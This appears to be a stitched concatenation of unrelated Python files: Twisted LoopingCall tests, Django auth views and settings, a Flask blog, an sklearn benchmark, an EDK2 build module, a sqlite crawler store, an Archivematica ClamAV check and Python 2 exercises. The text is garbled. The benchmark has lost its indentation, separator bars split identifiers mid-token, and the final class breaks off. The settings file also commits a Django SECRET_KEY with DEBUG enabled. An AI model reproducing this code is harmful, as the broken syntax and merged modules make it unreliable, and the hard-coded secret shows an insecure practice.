        D.addCallback(saveResult)
        clock.pump(timings)
        self.assertEquals(len(L), 3,
                          "got %d iterations, not 3" % (len(L),))
        # Every invocation must receive the args given to the constructor.
        for (a, b, c, d) in L:
            self.assertEquals(a, "a")
            self.assertEquals(b, "b")
            self.assertEquals(c, None)
            self.assertEquals(d, "d")
        lc.stop()
        # Stopping fires the start() deferred with the LoopingCall itself.
        self.assertIdentical(theResult[0], lc)
        # Make sure it isn't planning to do anything further.
        self.failIf(clock.calls)
    def testDelayedStart(self):
        # now=False: the first call only happens after one full interval.
        timings = [0.05, 0.1, 0.1]
        clock = Clock()
        L = []
        lc = TestableLoopingCall(clock, L.append, None)
        d = lc.start(0.1, now=False)
        theResult = []
        def saveResult(result):
            theResult.append(result)
        d.addCallback(saveResult)
        clock.pump(timings)
        self.assertEquals(len(L), 2,
                          "got %d iterations, not 2" % (len(L),))
        lc.stop()
        self.assertIdentical(theResult[0], lc)
        self.failIf(clock.calls)
    def testBadDelay(self):
        # Negative intervals are rejected up front.
        lc = task.LoopingCall(lambda: None)
        self.assertRaises(ValueError, lc.start, -1)
    # Make sure that LoopingCall.stop() prevents any subsequent calls.
    def _stoppingTest(self, delay):
        ran = []
        def foo():
            ran.append(None)
        clock = Clock()
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(delay, now=False)
        lc.stop()
        self.failIf(ran)
        self.failIf(clock.calls)
    def testStopAtOnce(self):
        return self._stoppingTest(0)
    def testStoppingBeforeDelayedStart(self):
        return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
    # Slightly inferior tests which exercise interactions with an actual
    # reactor.
    def testFailure(self):
        # An exception from the callable must errback the start() deferred.
        def foo(x):
            raise TestException(x)
        lc = task.LoopingCall(foo, "bar")
        return self.assertFailure(lc.start(0.1), TestException)
    def testFailAndStop(self):
        # Stopping from inside the callable must not swallow its exception.
        def foo(x):
            lc.stop()
            raise TestException(x)
        lc = task.LoopingCall(foo, "bar")
        return self.assertFailure(lc.start(0.1), TestException)
    def testEveryIteration(self):
        # interval=0: the call re-fires each reactor iteration until stopped.
        ran = []
        def foo():
            ran.append(None)
            if len(ran) > 5:
                lc.stop()
        lc = task.LoopingCall(foo)
        d = lc.start(0)
        def stopped(ign):
            self.assertEquals(len(ran), 6)
        return d.addCallback(stopped)
    def testStopAtOnceLater(self):
        # Ensure that even when LoopingCall.stop() is called from a
        # reactor callback, it still prevents any subsequent calls.
        d = defer.Deferred()
        def foo():
            d.errback(failure.DefaultException(
                "This task also should never get called."))
        self._lc = task.LoopingCall(foo)
        self._lc.start(1, now=False)
        reactor.callLater(0, self._callback_for_testStopAtOnceLater, d)
        return d
    def _callback_for_testStopAtOnceLater(self, d):
        self._lc.stop()
        reactor.callLater(0, d.callback, "success")
    def testWaitDeferred(self):
        # Tests if the callable isn't scheduled again before the returned
        # deferred has fired.
        timings = [0.2, 0.8]
        clock = Clock()
        def foo():
            d = defer.Deferred()
            d.addCallback(lambda _: lc.stop())
            clock.callLater(1, d.callback, None)
            return d
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(0.2)
        clock.pump(timings)
        self.failIf(clock.calls)
    def testFailurePropagation(self):
        # Tests if the failure of the errback of the deferred returned by the
        # callable is propagated to the lc errback.
        #
        # To make sure this test does not hang trial when LoopingCall does not
        # wait for the callable's deferred, it also checks there are no
        # calls in the clock's callLater queue.
        timings = [0.3]
        clock = Clock()
        def foo():
            d = defer.Deferred()
            clock.callLater(0.3, d.errback, TestException())
            return d
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(1)
        self.assertFailure(d, TestException)
        clock.pump(timings)
        self.failIf(clock.calls)
        return d
|
class Object:
    """Minimal named value object; the name is fixed at construction time."""

    def __init__(self, name):
        self._name = name

    @property
    def name(self):
        """Read-only view of the name supplied to the constructor."""
        return self._name
"""
This app is a simple extension of built in auth_views which overrides login and
logout to provide messages on successful login/out.
"""
from django.contrib.auth import views as auth_views
from django.utils.translation import ugettext as _
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm
from django.contrib import messages
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from btb.utils import can_edit_user
from accounts.forms import OptionalEmailForm
from registration.backends.simple.views import RegistrationView
def login(request, *args, **kwargs):
    """Delegate to django's auth login view, injecting the sidebar
    registration form into the template context."""
    kwargs['extra_context'] = {'reg_form': OptionalEmailForm(auto_id="regid_%s")}
    return auth_views.login(request, *args, **kwargs)
def logout(request, *args, **kwargs):
    """Delegate to django's logout view, flashing a success message first
    (the message must be queued while the session is still alive)."""
    messages.success(request, _("Successfully logged out."))
    return auth_views.logout(request, *args, **kwargs)
def check_username_availability(request):
    """AJAX endpoint: report whether ?username= is free.

    Returns a JSON body with "result" of null (no username supplied),
    "taken", or "available".
    """
    username = request.GET.get('username', None)
    # BUG FIX: the original fell through after building the null response,
    # so a missing username was overwritten by a query for username=None.
    if not username:
        response = HttpResponse('{"result": null}')
    elif User.objects.filter(username=username).exists():
        response = HttpResponse('{"result": "taken"}')
    else:
        response = HttpResponse('{"result": "available"}')
    response['Content-Type'] = "application/json"
    return response
def change_password(request, user_id):
    """
    Change the password of the user with the given user_id. Checks for
    permission to change users.
    """
    if not can_edit_user(request.user, user_id):
        raise PermissionDenied
    # Users changing their own password must confirm the old one
    # (PasswordChangeForm); admins setting someone else's use the form
    # without that check (SetPasswordForm).
    if request.user.id == int(user_id):
        Form = PasswordChangeForm
    else:
        Form = SetPasswordForm
    user = User.objects.get(id=user_id)
    # Check the HTTP method rather than `request.POST` truthiness so a POST
    # with an empty body is still validated instead of showing a blank form.
    if request.method == 'POST':
        form = Form(user, request.POST)
        if form.is_valid():
            form.save()
            messages.success(request, _("Password changed successfully."))
            return HttpResponseRedirect(reverse("profiles.profile_edit", args=[user_id]))
    else:
        # BUG FIX: the unbound form was built with request.user, so editing
        # another account rendered the wrong user's password form.
        form = Form(user)
    return render(request, "registration/password_change_form.html", {
        'form': form,
        'change_user': user,
    })
@login_required
def welcome(request):
    """Static post-login landing page; the template needs no extra context."""
    return render(request, 'registration/welcome.html')
class OptionalEmailRegistrationView(RegistrationView):
    """Registration flow using the email-optional form; after sign-up the
    user is sent back to wherever they were headed, if recorded."""
    form_class = OptionalEmailForm

    def get_success_url(self, user):
        # Consume the stashed destination from the session if present,
        # otherwise fall through to the standard post-registration page.
        try:
            return self.request.session.pop('after_login')
        except KeyError:
            return reverse("accounts-post-registration")
|
import datetime
from flask import abort, render_template, request, redirect, Response
import ctrl.blog
from . import handlers
@handlers.route('/blog')
def blog_index():
    """Paginated blog listing; ?page=N selects the (0-based) page and
    out-of-range pages redirect back to the previous one."""
    pageNo = 0
    if request.args.get('page'):
        pageNo = int(request.args.get('page'))
    if pageNo < 0:
        pageNo = 0
    posts = ctrl.blog.getPosts(pageNo)
    if not posts and pageNo > 0:
        # BUG FIX: the redirect response was created but never returned,
        # so past-the-end pages fell through and rendered an empty page.
        return redirect('/blog?page=%d' % (pageNo - 1))
    return render_template('blog/index.html', posts=posts, pageNo=pageNo)
@handlers.route('/blog/<year>/<month>/<slug>')
def blog_post(year, month, slug):
    """Render one blog post addressed by its year/month/slug triple;
    unknown posts yield a 404."""
    entry = ctrl.blog.getPostBySlug(int(year), int(month), slug)
    if not entry:
        abort(404)
    return render_template('blog/post.html', post=entry)
@handlers.route('/blog/rss')
def blog_rss():
    """RSS feed of the 15 most recent posts.

    The channel pubDate is the newest post's timestamp, or the current UTC
    time when there are no posts (the feed advertises GMT).
    """
    posts = ctrl.blog.getPosts(0, 15)
    # BUG FIX: the original fallback was datetime.time(), whose strftime
    # renders a bogus 1900-01-01 date; use the current UTC time instead.
    pubDate = datetime.datetime.utcnow()
    if posts:
        pubDate = posts[0].posted
    return Response(
        render_template('blog/rss.xml', posts=posts,
                        pubDate=pubDate.strftime('%a, %d %b %Y %H:%M:%S GMT')),
        content_type='application/rss+xml')
|
# Django settings for flexy project.
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# NOTE(review): DEBUG is enabled; this must be False in any production deploy.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
# MongoDB backend via django_mongodb_engine; database name is 'sheesh'.
DATABASES = {
    'default': {
        'ENGINE': 'django_mongodb_engine',
        'NAME': 'sheesh',
    }
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# SITE_ID is a MongoDB ObjectId string rather than the usual integer,
# matching django_mongodb_engine primary keys.
SITE_ID = u'54c3c2ebf0d6142f25b84dce'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before deploying.
SECRET_KEY = '9j(dx#&1&_s5^a71r4%+ct64(22rv6sm@ly07%1fwu4ta##&q)'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.messages.context_processors.messages',
    'django.contrib.auth.context_processors.auth',
)
ROOT_URLCONF = 'flexy.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'flexy.wsgi.application'
TEMPLATE_DIRS = (
    os.path.join(BASE_DIR, 'templates')
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Uncomment the next line to enable the admin:
    'django.contrib.admin',
    'bootstrap3',
    'app',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
|
"""
Benchmark for SGD regression
Compares SGD regression against coordinate descent and Ridge
on synthetik data.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# License: BSD Style.
import numpy as np
import pylab as pl
import gc
from time import time
from sklearn.linear_model import Ridge, SGDRegressor, ElasticNet
from sklearn.metrics import mean_squared_error
from sklearn.datasets.samples_generator import make_regression
if __name__ == "__main__":
list_n_samples = np.linspace(100, 10000, 5).astype(np.int)
list_n_features = [10, 100, 1000]
n_test = 1000
noise = 0.1
alpha = 0.01
sgd_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
elnet_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
ridge_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
for i, n_train in enumerate(list_n_samples):
for j, n_features in enumerate(list_n_features):
X, y, coef = make_regression(
n | _samples=n_train + n_test, n_features=n_features,
noise=noise, coef=True)
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
print("=======================")
print("Round %d %d" % (i, j))
print("n_features:", n_features)
print("n_samples:", n_train)
# Shuffle data
idx = np.arange(n_ | train)
np.random.seed(13)
np.random.shuffle(idx)
X_train = X_train[idx]
y_train = y_train[idx]
std = X_train.std(axis=0)
mean = X_train.mean(axis=0)
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
std = y_train.std(axis=0)
mean = y_train.mean(axis=0)
y_train = (y_train - mean) / std
y_test = (y_test - mean) / std
gc.collect()
print("- benching ElasticNet")
clf = ElasticNet(alpha=alpha, rho=0.5, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
elnet_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
elnet_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching SGD")
n_iter = np.ceil(10 ** 4.0 / n_train)
clf = SGDRegressor(alpha=alpha, fit_intercept=False,
n_iter=n_iter, learning_rate="invscaling",
eta0=.01, power_t=0.25)
tstart = time()
clf.fit(X_train, y_train)
sgd_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
sgd_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching RidgeRegression")
clf = Ridge(alpha=alpha, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
ridge_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
ridge_results[i, j, 1] = time() - tstart
# Plot results
i = 0
m = len(list_n_features)
pl.figure(figsize=(5 * 2, 4 * m))
for j in range(m):
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 0]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 0]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 0]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("RMSE")
pl.title("Test error - %d features" % list_n_features[j])
i += 1
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 1]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 1]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 1]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("Time [sec]")
pl.title("Training time - %d features" % list_n_features[j])
i += 1
pl.subplots_adjust(hspace=.30)
pl.show()
|
from django.db import models
from django.core.urlresolvers import reverse
from django.conf import settings
import misaka
from groups.models import Group
# Create your models here.
# POSTS MODELS.PY
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
    """A user-authored message, optionally attached to a group.

    The raw text lives in ``message``; ``message_html`` is derived from it
    via misaka on every save and is not directly editable.
    """
    user = models.ForeignKey(User, related_name='posts')
    # BUG FIX: use auto_now_add so the timestamp is set once at creation.
    # auto_now (as before) silently overwrote created_at on every save().
    created_at = models.DateTimeField(auto_now_add=True)
    message = models.TextField()
    message_html = models.TextField(editable=False)
    group = models.ForeignKey(Group, related_name='posts', null=True, blank=True)

    def __str__(self):
        return self.message

    def save(self, *args, **kwargs):
        # Re-render the HTML version whenever the post is saved.
        self.message_html = misaka.html(self.message)
        super().save(*args, **kwargs)

    def get_absolute_url(self):
        return reverse('posts:single', kwargs={'username': self.user.username, 'pk': self.pk})

    class Meta:
        ordering = ['-created_at']
        unique_together = ['user', 'message']
## @file
# process compress section generation
#
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
from . import Section
import subprocess
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import CompressSectionClassObject
from Common.DataType import *
## generate compress section
#
#
class CompressSection (CompressSectionClassObject) :
    ## compress types: PI standard and non PI standard
    CompTypeDict = {
        'PI_STD' : 'PI_STD',
        'PI_NONE' : 'PI_NONE'
    }
    ## The constructor
    #
    #   @param  self        The object pointer
    #
    def __init__(self):
        CompressSectionClassObject.__init__(self)
    ## GenSection() method
    #
    #   Generate compressed section
    #
    #   @param  self        The object pointer
    #   @param  OutputPath  Where to place output file
    #   @param  ModuleName  Which module this section belongs to
    #   @param  SecNum      Index of section
    #   @param  KeyStringList  Filter for inputs of section generation
    #   @param  FfsInf      FfsInfStatement object that contains this section data
    #   @param  Dict        dictionary contains macro and its value
    #   @retval tuple       (Generated file name, section alignment)
    #
    def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf = None, Dict = {}, IsMakefile = False):
        # NOTE(review): Dict={} is a shared mutable default; it is only passed
        # through to child sections here, so it is harmless as long as no
        # callee mutates it.
        if FfsInf is not None:
            self.CompType = FfsInf.__ExtendMacro__(self.CompType)
            self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
        SectFiles = tuple()
        SectAlign = []
        Index = 0
        MaxAlign = None
        # Generate every child section first, tracking the largest alignment
        # requested by any child.
        for Sect in self.SectionList:
            Index = Index + 1
            SecIndex = '%s.%d' %(SecNum, Index)
            ReturnSectList, AlignValue = Sect.GenSection(OutputPath, ModuleName, SecIndex, KeyStringList, FfsInf, Dict, IsMakefile=IsMakefile)
            if AlignValue is not None:
                if MaxAlign is None:
                    MaxAlign = AlignValue
                if GenFdsGlobalVariable.GetAlignment (AlignValue) > GenFdsGlobalVariable.GetAlignment (MaxAlign):
                    MaxAlign = AlignValue
            if ReturnSectList != []:
                # Children without an explicit alignment default to "1".
                if AlignValue is None:
                    AlignValue = "1"
                for FileData in ReturnSectList:
                    SectFiles += (FileData,)
                    SectAlign.append(AlignValue)
        OutputFile = OutputPath + \
                     os.sep + \
                     ModuleName + \
                     SUP_MODULE_SEC + \
                     SecNum + \
                     SectionSuffix['COMPRESS']
        OutputFile = os.path.normpath(OutputFile)
        DummyFile = OutputFile + '.dummy'
        # Two passes: first concatenate the child sections (with alignment)
        # into a dummy file, then compress that dummy into the real output.
        GenFdsGlobalVariable.GenerateSection(DummyFile, SectFiles, InputAlign=SectAlign, IsMakefile=IsMakefile)
        GenFdsGlobalVariable.GenerateSection(OutputFile, [DummyFile], Section.Section.SectionType['COMPRESS'],
                                             CompressionType=self.CompTypeDict[self.CompType], IsMakefile=IsMakefile)
        OutputFileList = []
        OutputFileList.append(OutputFile)
        return OutputFileList, self.Alignment
|
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
    """sqlite3-backed store for crawled domains, pages and robots rulesets."""
    def __init__(self):
        '''Open ./items.db and create the tables if they do not exist.'''
        self.conn = sqlite3.connect("./items.db")
        if VERBOSE:
            print 'Database connection OPEN.'
        # Domains table
        self.conn.execute(CTABLE_DOMAIN)
        # Websites table
        self.conn.execute(CTABLE_WEBSITE)
        # Rulesets table
        self.conn.execute(CTABLE_RULESETS)
        self.conn.commit()
        if VERBOSE:
            cur = self.conn.cursor()
            print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    def close(self):
        '''Close the database connection.'''
        if VERBOSE:
            print 'Database connection CLOSE.'
        self.conn.close()
    def insertDomain(self, domain, indegree=0, outdegree=0):
        '''Insert a new domain row.'''
        cur = self.conn.cursor()
        cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
        # Flush to disk
        self.conn.commit()
    def insertRuleset(self, ruleset, domain):
        '''Insert a robots.txt ruleset for an already-known domain.'''
        cur = self.conn.cursor()
        cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
        did = cur.fetchone()[0]
        cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
        # Flush to disk
        self.conn.commit()
    def insertWebsite(self, url, domain):
        '''Insert a page (marked unvisited) and bump its domain's counter.'''
        cur = self.conn.cursor()
        cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
        result = cur.fetchone()
        if not result:
            # No row for this domain yet: create it with indegree set to 1.
            if VERBOSE:
                print 'Spot Domain:',domain
            self.insertDomain(domain, indegree=1)
            cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
            did = cur.fetchone()[0]
        else:
            did = result[0]
            # Domain already known.
            # NOTE(review): the original comment says "indegree +1" here, but
            # the statement increments *outdegree* -- confirm which is intended.
            cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
        cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
        # Flush to disk
        self.conn.commit()
    def updateInfo(self, item, newlinks, oldlinks):
        '''Update the database after the crawler finished fetching a page.'''
        cur = self.conn.cursor()
        cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
        wid, did = cur.fetchone()
        # Update the website row: store the title and mark it visited.
        cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
        # The page's domain gains one outgoing link per link found on the page.
        cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
        # Update the rows touched by every link on this page.
        # Links the caller judged as never seen before:
        for link,domain in newlinks:
            self.insertWebsite(link, domain)
        # Links the caller judged as already seen:
        for link,domain in oldlinks:
            # NOTE(review): original comment says "increase the domain's
            # indegree" but the statement updates outdegree -- confirm intent.
            cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
        # Flush to disk
        self.conn.commit()
    def robotsrulesetOfDomain(self, domain):
        '''Check whether domain is present in the database.

        Returns (False, None) when absent; otherwise (True, stored
        robots.txt ruleset row -- which may itself be None).
        '''
        exist = False
        cur = self.conn.cursor()
        # Does the domain exist at all?
        cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
        if cur.fetchone() :
            exist = True
        # If it exists, what is the stored result?
        cur.execute("SELECT rules FROM Domains,Rulesets "
                    "WHERE domain=? AND Domains.did=Rulesets.did"
                    ,(domain,) )
        ruleset = cur.fetchone()
        return (exist, ruleset)
    def rollback(self):
        # Undo the current uncommitted transaction.
        self.conn.rollback()
    def showAll(self):
        '''Dump the Domains and Websites tables to stdout (debugging aid).'''
        self.conn.commit()
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM Domains")
        print cur.fetchall()
        cur.execute("SELECT * FROM Websites")
        print cur.fetchall()
# Process-wide DatabaseHelper singleton, created lazily.
_dbcli = None

def getCliInstance():
    """Return the shared DatabaseHelper, creating it on first use."""
    global _dbcli
    if _dbcli is None:
        _dbcli = DatabaseHelper()
    return _dbcli
def test():
    '''Manual smoke test: query two domains and dump the tables.'''
    dbcli = getCliInstance()
    # dbcli.insertDomain('jaysonhwang.com')
    # dbcli.insertRuleset('test','jaysonhwang.com')
    print dbcli.robotsrulesetOfDomain('www.zol.com')
    print dbcli.robotsrulesetOfDomain('jayson.com')
    dbcli.showAll()
    dbcli.close()
if __name__ == '__main__':
    test()
|
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
#source /etc/archivematica/archivematicaConfig.conf
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
from databaseFunctions import insertIntoEvents
from archivematicaFunctions import escapeForCommand
# Summary line clamdscan prints for a clean file.
clamscanResultShouldBe="Infected files: 0"

if __name__ == '__main__':
    # argv: <fileUUID> <path of file to scan> <event date> <taskUUID>
    fileUUID = sys.argv[1]
    target = sys.argv[2]
    date = sys.argv[3]
    taskUUID = sys.argv[4]
    # BUG FIX: the opening quote was misplaced ('clamdscan - <" ' + target),
    # which made the shell redirect from a filename starting with a space.
    # The redirect must be:  clamdscan - < "target"
    command = 'clamdscan - < "' + escapeForCommand(target) + '"'
    print >>sys.stderr, command
    commandVersion = "clamdscan -V"
    eventOutcome = "Pass"
    # executeOrRun returns a tuple whose first element is the exit status and
    # second element the captured output (see usage below).
    clamscanOutput = executeOrRun("bashScript", command, printing=False)
    clamscanVersionOutput = executeOrRun("command", commandVersion, printing=False)
    if clamscanOutput[0] or clamscanVersionOutput[0]:
        if clamscanVersionOutput[0]:
            # Can't even report the scanner version: hard failure.
            print >>sys.stderr, clamscanVersionOutput
            exit(2)
        else:
            eventOutcome = "Fail"
    # A clean scan must contain the "Infected files: 0" summary line.
    if eventOutcome == "Fail" or clamscanOutput[1].find(clamscanResultShouldBe) == -1:
        eventOutcome = "Fail"
        print >>sys.stderr, fileUUID, " - ", os.path.basename(target)
        print >>sys.stderr, clamscanOutput
    # "clamdscan -V" output is three '/'-separated fields:
    # program version / virus definitions / definitions date.
    version, virusDefs, virusDefsDate = clamscanVersionOutput[1].split("/")
    virusDefs = virusDefs + "/" + virusDefsDate
    eventDetailText = "program=\"Clam AV\"; version=\"" + version + "\"; virusDefinitions=\"" + virusDefs + "\""
    if fileUUID != "None":
        insertIntoEvents(fileUUID=fileUUID, eventIdentifierUUID=taskUUID, eventType="virus check", eventDateTime=date, eventDetail=eventDetailText, eventOutcome=eventOutcome, eventOutcomeDetailNote="")
    if eventOutcome != "Pass":
        exit(3)
|
# Write a triangular multiplication table (1..9) to helloworld.txt.
outfile=open("helloworld.txt","w")
for num1 in range(1,10):
    for num2 in range(1,10):
        if num2<=num1 :
            outfile.write("{}*{}={} ".format(num2, num1 ,num1 * num2))
    outfile.write(" \n")
    outfile.flush()
outfile.close()
# Read the file back and echo each line (Python 2 print statement).
infile=open("helloworld.txt","r")
for line in infile.readlines():
    print line
infile.close()
import sys
# Write directly to the standard streams, bypassing print.
sys.stdout.write("foo\n")
sys.stderr.write("foo2 \n")
def test_var_kwargs(farg, **kwargs):
    # Demonstrates how **kwargs collects arbitrary keyword arguments.
    print "formal arg:", farg
    for key in kwargs:
        print "arg: {}:{}".format(key, kwargs[key])
test_var_kwargs(2,a="sd",b="ds")
def return_stuff(var):
    """Return a fixed heterogeneous list; *var* is ignored."""
    payload = [1, 2, {'a': 1, 'b': 2}, 'string']
    return payload
a=return_stuff(1)
print a
# Rebinding a module-level name from inside a function requires `global`.
x=222
def t1():
    global x
    x=111
t1()
print x
import os
# List a directory entry-by-entry, then again as a single list.
for ld in os.listdir("c:/Miko"):
    print ld
print os.listdir("c:/Miko")
class Person(object):
    """A person identified by a first and last name."""

    def __init__(self, first_name, last_name):
